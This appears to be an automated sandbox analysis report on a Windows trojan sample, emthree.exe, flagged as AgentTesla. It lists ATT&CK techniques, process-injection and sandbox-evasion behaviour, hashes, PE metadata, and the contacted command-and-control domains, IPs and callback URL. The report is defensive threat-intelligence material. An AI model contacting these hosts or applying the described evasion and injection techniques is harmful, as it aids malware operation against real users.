          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Timestomp1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronDLL Side-Loading1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

Behavior Graph ID: 323574
Sample: emthree.exe
Start date: 27/11/2020
Architecture: WINDOWS
Score: 100

Process tree and signatures recovered from the graph:

• Start: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
  • emthree.exe (started)
    • Dropped file: C:\Users\user\AppData\...\emthree.exe.log, ASCII
    • Tries to detect virtualization through RDTSC time measurements
    • emthree.exe (started)
      • Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe (injected)
        • DNS/IP: porncamslivechat.com, 184.154.50.243, 49746, 80, SINGLEHOP-LLCUS, United States
        • DNS/IP: www.amarilloautoexpress.com, 23.27.109.19, 49747, 80, EGIHOSTINGUS, United States
        • 4 other IPs or domains
        • System process connects to network (likely due to code injection or exploit)
        • rundll32.exe (started)
          • Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started)
            • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
emthree.exe | 41% | Metadefender |
emthree.exe | 65% | ReversingLabs | Win32.Trojan.AgentTesla
emthree.exe | 100% | Avira | TR/Kryptik.zirmt
emthree.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.emthree.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.fontbureau.comu | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.amarilloautoexpress.com | 23.27.109.19 | true | true | | unknown
porncamslivechat.com | 184.154.50.243 | true | true | | unknown
www.porncamslivechat.com | unknown | unknown | true | | unknown
www.asojebu.com | unknown | unknown | true | | unknown
www.haircuressteampod.com | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.comm | emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comu | emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                          Contacted IPs


                                          Public

                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                          23.27.109.19 | unknown | United States | 18779 | EGIHOSTINGUS | true
                                          184.154.50.243 | unknown | United States | 32475 | SINGLEHOP-LLCUS | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:323574
                                          Start date:27.11.2020
                                          Start time:06:35:16
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 6s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:emthree.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@4/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 19.8% (good quality ratio 18%)
                                          • Quality average: 73.7%
                                          • Quality standard deviation: 30.5%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 2.20.84.85, 52.155.217.156, 20.54.26.129, 40.67.254.36, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 204.79.197.200, 13.107.21.200
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323574/sample/emthree.exe

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          06:36:09 | API Interceptor | 15x Sleep call for process: emthree.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN

                                          Match | Associated Sample Name / URL | Detection | Context
                                          SINGLEHOP-LLCUS | document-1514127389.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1514127389.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1561665791.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1597193979.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1561665791.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1502756172.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1502756172.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1593420450.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1526904949.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1593420450.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1526904949.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1560775643.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1560775643.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-162270445.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-162270445.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1490556011.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1490556011.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1469700244.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1469700244.xls | malicious | 67.212.179.162
                                          SINGLEHOP-LLCUS | document-1511476.xls | malicious | 67.212.179.162
                                          EGIHOSTINGUS | PI202009255687.xlsx | malicious | 104.164.99.242
                                          EGIHOSTINGUS | VOMAXTRADING.doc | malicious | 50.117.11.156
                                          EGIHOSTINGUS | inv.exe | malicious | 104.164.35.80
                                          EGIHOSTINGUS | 2020112395387_pdf.exe | malicious | 104.164.99.242
                                          EGIHOSTINGUS | EME_PO.39134.xlsx | malicious | 104.164.26.233
                                          EGIHOSTINGUS | new quotation order.exe | malicious | 104.252.31.62
                                          EGIHOSTINGUS | POGWEAP.xlsx | malicious | 172.120.44.167
                                          EGIHOSTINGUS | oqTdpbN5rF.exe | malicious | 104.252.192.7
                                          EGIHOSTINGUS | Purchase Order 40,7045$.exe | malicious | 104.253.79.71
                                          EGIHOSTINGUS | Payment Advice - Advice Ref GLV823990339.exe | malicious | 104.164.52.200
                                          EGIHOSTINGUS | INQUIRY.exe | malicious | 45.39.88.85
                                          EGIHOSTINGUS | Invoice.exe | malicious | 45.39.153.189
                                          EGIHOSTINGUS | new file.exe.exe | malicious | 136.0.180.203
                                          EGIHOSTINGUS | hjKM0s7CWW.exe | malicious | 172.121.57.222
                                          EGIHOSTINGUS | 9Ul8m9FQ47.exe | malicious | 107.164.194.74
                                          EGIHOSTINGUS | n4uladudJS.exe | malicious | 107.164.194.74
                                          EGIHOSTINGUS | qkN4OZWFG6.exe | malicious | 50.117.84.157
                                          EGIHOSTINGUS | kvdYhqN3Nh.exe | malicious | 50.117.84.157
                                          EGIHOSTINGUS | NzI1oP5E74.exe | malicious | 172.121.57.222
                                          EGIHOSTINGUS | jtFF5EQoEE.exe | malicious | 142.252.135.158

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log
                                          Process:C:\Users\user\Desktop\emthree.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.345637324625647
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                          MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                          SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                          SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                          SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.696882160461213
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:emthree.exe
                                          File size:459776
                                          MD5:25b5788669a3a8f35596ce975f0823a7
                                          SHA1:77e07883f131f342e3d24954ea348d25554440a1
                                          SHA256:f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
                                          SHA512:53f7273b1d20ec613cb1bcb0c4a30272c90f8585515be013f52be236e9cccc4457b2fab52b9649092807f4de9ab9da21a11d63897c0ed8e9fff02eebefaf1f03
                                          SSDEEP:12288:YK8UvYOUgUihAbxk6nVTBWOfK/Kl3+XXt8LF:YK8Uv2dbvT0OfKClid8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f................0.............f.... ... ....@.. .......................`............@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x471966
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71914 | 0x4f | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x594 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x718f8 | 0x1c | .text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x6f96c | 0x6fa00 | False | 0.841486299692 | data | 7.70662287757 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x72000 | 0x594 | 0x600 | False | 0.415364583333 | data | 4.06023267139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0x74000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_VERSION | 0x72090 | 0x304 | data | |
                                          RT_MANIFEST | 0x723a4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                          Imports

                                          DLL | Import
                                          mscoree.dll | _CorExeMain

                                          Version Infos

                                          Description | Data
                                          Translation | 0x0000 0x04b0
                                          LegalCopyright | Copyright 2019
                                          Assembly Version | 1.0.0.0
                                          InternalName | .exe
                                          FileVersion | 1.0.0.0
                                          CompanyName |
                                          LegalTrademarks |
                                          Comments |
                                          ProductName | Monopoly
                                          ProductVersion | 1.0.0.0
                                          FileDescription | Monopoly
                                          OriginalFilename | .exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Nov 27, 2020 06:37:46.503295898 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:46.628735065 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:46.628865004 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:46.629072905 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:46.754323959 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
